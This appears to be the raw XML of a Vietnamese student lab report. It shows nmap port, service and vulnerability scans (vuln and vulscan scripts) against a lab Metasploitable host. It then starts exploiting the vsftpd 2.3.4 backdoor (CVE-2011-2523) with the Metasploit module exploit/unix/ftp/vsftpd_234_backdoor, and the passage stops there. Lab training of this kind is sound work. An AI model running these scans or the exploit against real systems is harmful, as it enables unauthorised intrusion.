    <w:p w14:paraId="1A1742A9" w14:textId="7B3C6EBD" w:rsidR="003C0C3F" w:rsidRPr="000739B5" w:rsidRDefault="003C0C3F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871499C" wp14:editId="70D67003">
            <wp:extent cx="5731510" cy="2437130"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="182973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37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8F7B" w14:textId="32E949F1" w:rsidR="00117453" w:rsidRPr="000739B5" w:rsidRDefault="00117453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Cài đặt CSDL vulscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A02327E" w14:textId="76E31B01" w:rsidR="00117453" w:rsidRPr="000739B5" w:rsidRDefault="00117453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18FE59C" wp14:editId="69C7CC08">
            <wp:extent cx="5731510" cy="1713230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="11850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13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E31C" w14:textId="2F987B0C" w:rsidR="00607471" w:rsidRPr="000739B5" w:rsidRDefault="00607471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3. Rà quét để tìm thông tin về host, cổng, dịch vụ và HĐH sử dụng nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6869E3E2" w14:textId="5C22CE2C" w:rsidR="003715AF" w:rsidRPr="000739B5" w:rsidRDefault="003715AF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3E4C61D3" wp14:editId="5564C400">
            <wp:extent cx="5731510" cy="3293110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="200601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138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6E40" w14:textId="3277692E" w:rsidR="001A03E4" w:rsidRPr="000739B5" w:rsidRDefault="001A03E4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A0AE9FF" wp14:editId="7EF1097D">
            <wp:extent cx="5731510" cy="4260850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="119390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03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2192" w14:textId="6209921D" w:rsidR="00072DB6" w:rsidRPr="000739B5" w:rsidRDefault="00072DB6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Tìm các cổng đang hoạt động trên 1 host (thực hiện với máy Meta và 2 IP hoạt động)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691F16D5" w14:textId="031590EC" w:rsidR="00072DB6" w:rsidRPr="000739B5" w:rsidRDefault="00072DB6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D657164" wp14:editId="506283CF">
            <wp:extent cx="5731510" cy="3890010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="119836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607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90A3" w14:textId="77777777" w:rsidR="00072DB6" w:rsidRPr="000739B5" w:rsidRDefault="00072DB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B36F26B" w14:textId="77777777" w:rsidR="00072DB6" w:rsidRPr="000739B5" w:rsidRDefault="00072DB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273A5F3F" w14:textId="77777777" w:rsidR="00072DB6" w:rsidRPr="000739B5" w:rsidRDefault="00072DB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01EE2708" w14:textId="1249E1BF" w:rsidR="00072DB6" w:rsidRPr="000739B5" w:rsidRDefault="00072DB6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Tìm thông tin các dịch vụ đang chạy và hệ điều hành của host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3898BA" w14:textId="7DAB35AA" w:rsidR="00CB6512" w:rsidRPr="000739B5" w:rsidRDefault="00CB6512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C36C7ED" wp14:editId="22AD765F">
            <wp:extent cx="5731510" cy="1944370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="101400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003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E015" w14:textId="18DD13A2" w:rsidR="00B62A88" w:rsidRPr="000739B5" w:rsidRDefault="00B62A88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3. Rà quét để tìm các lỗ hổng trên 1 host hoặc 1 dịch vụ đang hoạt động</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488E9A6C" w14:textId="69FDEF82" w:rsidR="00E754B2" w:rsidRPr="000739B5" w:rsidRDefault="00E754B2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Tìm lỗ hổng trên các dịch vụ của máy Meta với script ngầm định</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B5EC88" w14:textId="11C25156" w:rsidR="004E386E" w:rsidRPr="000739B5" w:rsidRDefault="004E386E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nmap -sC 192.168.100.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD53FAD" w14:textId="6FFD017B" w:rsidR="00DC4634" w:rsidRPr="000739B5" w:rsidRDefault="00DC4634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582ED21B" wp14:editId="552F8C21">
            <wp:extent cx="5731510" cy="4352290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="88031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139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988F" w14:textId="6B478DE8" w:rsidR="00BC4149" w:rsidRPr="000739B5" w:rsidRDefault="00BC4149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31BECDA" wp14:editId="6E7CB137">
            <wp:extent cx="5731510" cy="4365625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="53176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629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ADDE" w14:textId="65EECDBF" w:rsidR="00643D92" w:rsidRPr="000739B5" w:rsidRDefault="00643D92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Tìm lỗ hổng trên các dịch vụ FTP của máy Meta với vulscan script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A652E5" w14:textId="11BDF14F" w:rsidR="00811B17" w:rsidRPr="000739B5" w:rsidRDefault="00D36D1E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lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="aink">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EDF12FB" wp14:editId="58094C1F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-2228970</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>199675</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="360" cy="2880"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="37254537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2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7456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EDF12FB" wp14:editId="58094C1F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-2228970</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>199675</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="360" cy="2880"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="372545370" name="Ink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2545370" name="Ink 6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10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11B17" w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>nmap --script=vuln -sV -p21 192.168.100.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1575D279" w14:textId="6D35BA2A" w:rsidR="00A36BA5" w:rsidRPr="000739B5" w:rsidRDefault="00D36D1E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133DE96" wp14:editId="1D9194B8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>277350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1037120</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2867760" cy="249840"/>
                <wp:effectExtent l="38100" t="38100" r="27940" b="36195"/>
                <wp:wrapNone/>
                <wp:docPr id="198594418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86776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1DD2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21.5pt;margin-top:81.3pt;width:226.5pt;height:20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">
                <v:imagedata r:id="rId25" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F35A07" w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAns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271ECA2" wp14:editId="34A0636C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>102390</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>750760</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="711720" cy="168840"/>
                <wp:effectExtent l="38100" t="38100" r="31750" b="41275"/>
                <wp:wrapNone/>
                <wp:docPr id="194615064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117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C5DE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7.7pt;margin-top:58.75pt;width:56.75pt;height:1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">
                <v:imagedata r:id="rId27" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A36BA5"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02D6328" wp14:editId="0812FD74">
            <wp:extent cx="5731510" cy="2428875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="139138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801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072B" w14:textId="77777777" w:rsidR="000D727E" w:rsidRPr="000739B5" w:rsidRDefault="000D727E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A8F5F2" w14:textId="77777777" w:rsidR="000D727E" w:rsidRPr="000739B5" w:rsidRDefault="000D727E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4953E734" w14:textId="77777777" w:rsidR="000D727E" w:rsidRPr="000739B5" w:rsidRDefault="000D727E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60DBBA0D" w14:textId="77777777" w:rsidR="000D727E" w:rsidRPr="000739B5" w:rsidRDefault="000D727E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E003C35" w14:textId="77777777" w:rsidR="000D727E" w:rsidRPr="000739B5" w:rsidRDefault="000D727E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="158ECD27" w14:textId="77777777" w:rsidR="000D727E" w:rsidRPr="000739B5" w:rsidRDefault="000D727E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="017A22E8" w14:textId="77777777" w:rsidR="000D727E" w:rsidRPr="000739B5" w:rsidRDefault="000D727E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BCFDF9E" w14:textId="6A06E3B8" w:rsidR="000D727E" w:rsidRPr="000739B5" w:rsidRDefault="007B55B5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Tìm lỗ hổng trên các dịch vụ HTTP của máy Meta với vulscan script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54579FA6" w14:textId="4A630780" w:rsidR="000D727E" w:rsidRPr="000739B5" w:rsidRDefault="000D727E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nmap --script=vuln -sV -p80 192.168.100.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26585BB4" w14:textId="00DF84C7" w:rsidR="00A36BA5" w:rsidRPr="000739B5" w:rsidRDefault="00F35A07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9F581B7" wp14:editId="1C10284E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>111750</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1910045</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="609480" cy="142200"/>
                <wp:effectExtent l="38100" t="38100" r="38735" b="48895"/>
                <wp:wrapNone/>
                <wp:docPr id="55357528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094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025F5" id="Ink 2" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:8.45pt;margin-top:150.05pt;width:48.7pt;height:11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">
                <v:imagedata r:id="rId30" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A36BA5"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284C6DB" wp14:editId="3CC31F2F">
            <wp:extent cx="5731510" cy="4309110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="33691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119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9EDD" w14:textId="61EDD75A" w:rsidR="00DB7BD6" w:rsidRPr="000739B5" w:rsidRDefault="00DB7BD6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Tìm lỗ hổng trên các dịch vụ FTP của máy Meta với vulscan script và chỉ với cơ sở dữ liệu cve.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B47579" w14:textId="7B96C371" w:rsidR="007E3B26" w:rsidRPr="000739B5" w:rsidRDefault="007E3B26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nmap -p 21 --script=vuln --script-args vulscandb=cve.csv 192.168.100.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C9A59" w14:textId="60A953F5" w:rsidR="007E3B26" w:rsidRPr="000739B5" w:rsidRDefault="00F35A07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B06BC30" wp14:editId="0AC6054D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>125430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>783210</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="954720" cy="244440"/>
                <wp:effectExtent l="38100" t="38100" r="36195" b="41910"/>
                <wp:wrapNone/>
                <wp:docPr id="206466886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5472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B9566" id="Ink 3" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:9.55pt;margin-top:61.3pt;width:75.85pt;height:2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">
                <v:imagedata r:id="rId33" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007E3B26"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11661DF" wp14:editId="76BDFBE5">
            <wp:extent cx="5731510" cy="2468880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="147443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357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D4E2" w14:textId="77777777" w:rsidR="00ED13CD" w:rsidRPr="000739B5" w:rsidRDefault="00ED13CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C67A41E" w14:textId="77777777" w:rsidR="00ED13CD" w:rsidRPr="000739B5" w:rsidRDefault="00ED13CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE363E6" w14:textId="77777777" w:rsidR="00ED13CD" w:rsidRPr="000739B5" w:rsidRDefault="00ED13CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33403B67" w14:textId="77777777" w:rsidR="00ED13CD" w:rsidRPr="000739B5" w:rsidRDefault="00ED13CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B397D5A" w14:textId="5DA2ED1D" w:rsidR="00ED13CD" w:rsidRPr="000739B5" w:rsidRDefault="00ED13CD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lastRenderedPageBreak/>
        <w:t>Tìm lỗ hổng trên các dịch vụ HTTP của máy Meta với vulscan script và chỉ với cơ sở dữ liệu cve.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44100EAA" w14:textId="47FD3A28" w:rsidR="004936E6" w:rsidRPr="000739B5" w:rsidRDefault="004936E6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nmap -sV -p80 --script=vuln --script-args vulscandb=cve.csv 192.168.100.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DD5CE8" w14:textId="2457527A" w:rsidR="00ED13CD" w:rsidRPr="000739B5" w:rsidRDefault="00F35A07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mc:AlternateContent>
          <mc:Choice Requires="aink">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4503C798" wp14:editId="0D5A289F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-2660970</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1224060</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="360" cy="360"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="145781936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4384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4503C798" wp14:editId="0D5A289F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-2660970</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1224060</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="360" cy="360"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1457819361" name="Ink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7819361" name="Ink 6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0739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAns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7B11500" wp14:editId="381E5AFD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-2324370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>868380</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="360" cy="360"/>
                <wp:effectExtent l="38100" t="38100" r="38100" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="4772781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E7394" id="Ink 5" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:-183.35pt;margin-top:68.05pt;width:.75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">
                <v:imagedata r:id="rId38" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAns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DA2ACB9" wp14:editId="37684BE2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-1270290</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>741300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="360" cy="360"/>
                <wp:effectExtent l="38100" t="38100" r="38100" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="81855508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03316" id="Ink 4" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:-100.35pt;margin-top:58pt;width:.7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">
                <v:imagedata r:id="rId38" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00ED13CD" w:rsidRPr="000739B5"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59145974" wp14:editId="11BC0E09">
            <wp:extent cx="5731510" cy="4318635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="140552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294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9624" w14:textId="356984CF" w:rsidR="006B5058" w:rsidRPr="000739B5" w:rsidRDefault="006B5058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C18D297" wp14:editId="4BFC93A6">
            <wp:extent cx="5731510" cy="4060825"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3297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16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448C" w14:textId="5CF5E822" w:rsidR="00012150" w:rsidRPr="000739B5" w:rsidRDefault="00012150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0D759E2" wp14:editId="32D864CA">
            <wp:extent cx="5731510" cy="4038600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="146041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193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FACE" w14:textId="3806F101" w:rsidR="001E78A8" w:rsidRPr="000739B5" w:rsidRDefault="00D36D1E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CD17258" wp14:editId="3B697CF7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2882670</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>226215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="360" cy="360"/>
                <wp:effectExtent l="38100" t="38100" r="38100" b="38100"/>
                <wp:wrapNone/>
                <wp:docPr id="158467907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C64D5" id="Ink 4" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:226.65pt;margin-top:17.45pt;width:.75pt;height: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E0HStNcBAACeBAAAEAAA&#10;AAAAAAAAAAAAAADTAwAAZHJzL2luay9pbmsxLnhtbFBLAQItABQABgAIAAAAIQBJb+NK3wAAAAkB&#10;AAAPAAAAAAAAAAAAAAAAANgFAABkcnMvZG93bnJldi54bWxQSwECLQAUAAYACAAAACEAeRi8nb8A&#10;AAAhAQAAGQAAAAAAAAAAAAAAAADkBgAAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAA&#10;BgAGAHgBAADaBwAAAAA=&#10;">
                <v:imagedata r:id="rId44" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007345BC" w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="001E78A8" w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khai thác lỗ </w:t>
      </w:r>
      <w:r w:rsidR="007345BC" w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">hổng </w:t>
      </w:r>
      <w:r w:rsidR="007345BC" w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Lựa chọn 1 lỗ hổng (có mã CVE/ID của lỗ hổng) tìm được ở mục 3, tiến hành khai thác sử dụng MetaSploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6BE74D" w14:textId="687DB4F8" w:rsidR="00D36D1E" w:rsidRPr="000739B5" w:rsidRDefault="00D36D1E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-Theo như kết quả quét từ nmap , máy victim đang chạy dịch vụ Vsftpd v2.3.4 trên cổng 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1DE02C" w14:textId="6AD92000" w:rsidR="00BB6160" w:rsidRPr="000739B5" w:rsidRDefault="00BB6160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 xml:space="preserve">Ta sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00A81B9F" w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hai thác cửa hậu trên Vsftpd v2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E20D2E8" w14:textId="249BA08D" w:rsidR="00D36D1E" w:rsidRPr="000739B5" w:rsidRDefault="00D36D1E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16AF9B9" wp14:editId="46CD23A4">
            <wp:extent cx="5731510" cy="2479040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="108727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7007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4664" w14:textId="16B04756" w:rsidR="006C308C" w:rsidRPr="000739B5" w:rsidRDefault="006C308C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 xml:space="preserve">Tiến hành xác định lỗ hổng bảo mật của dịch vsftpd 2.3.4 đang chạy trên máy victim </w:t>
      </w:r>
      <w:r w:rsidR="00875FD2" w:rsidRPr="000739B5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 w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> lỗ hổng bảo mật : CVE -2011-2523 (vsFTPd version 2.3.4 back door)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FDDF23" w14:textId="1A99F0B0" w:rsidR="00BA61C7" w:rsidRPr="000739B5" w:rsidRDefault="00BA61C7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Khởi động metaspolit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E834BB" w14:textId="6F0D2E7D" w:rsidR="00BA61C7" w:rsidRPr="000739B5" w:rsidRDefault="00BA61C7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7BD6206" wp14:editId="65718E53">
            <wp:extent cx="5731510" cy="3963670"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="113290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0760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A474" w14:textId="3787FEFA" w:rsidR="00E23804" w:rsidRPr="000739B5" w:rsidRDefault="00E23804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sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="00336662" w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> lệnh</w:t>
      </w:r>
      <w:r w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: search vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368A666E" w14:textId="02A2B68D" w:rsidR="00610635" w:rsidRPr="000739B5" w:rsidRDefault="00610635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741F07D" wp14:editId="484534FD">
            <wp:extent cx="5731510" cy="1220470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="137183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3862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C42C" w14:textId="71CA2F73" w:rsidR="00336662" w:rsidRPr="000739B5" w:rsidRDefault="00336662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 xml:space="preserve">Khai báo sử dụng mô đun tấn </w:t>
      </w:r>
      <w:r w:rsidR="00537A01" w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">công: </w:t>
      </w:r>
      <w:r w:rsidR="00537A01" w:rsidRPr="000739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EDBF05" w14:textId="7D7E149D" w:rsidR="00ED35A8" w:rsidRPr="000739B5" w:rsidRDefault="00ED35A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0739B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
